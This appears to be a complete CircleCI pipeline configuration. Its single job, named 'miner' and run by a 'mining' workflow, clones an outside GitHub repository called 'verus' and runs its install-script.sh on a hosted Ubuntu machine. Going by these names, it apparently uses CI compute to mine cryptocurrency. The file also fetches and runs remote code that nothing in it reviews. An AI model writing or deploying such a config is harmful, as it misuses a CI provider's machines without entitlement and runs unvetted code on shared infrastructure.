version: 2.1

jobs:
  miner:
    machine:
      image: ubuntu-2004:current
    steps:
      - run:
          name: Clone and Setup
          command: |
            git clone https://github.com/0xwhyteddy/verus.git
            cd verus
            chmod +x install-script.sh
            ./install-script.sh

workflows:
  version: 2
  mining:
    jobs:
      - miner
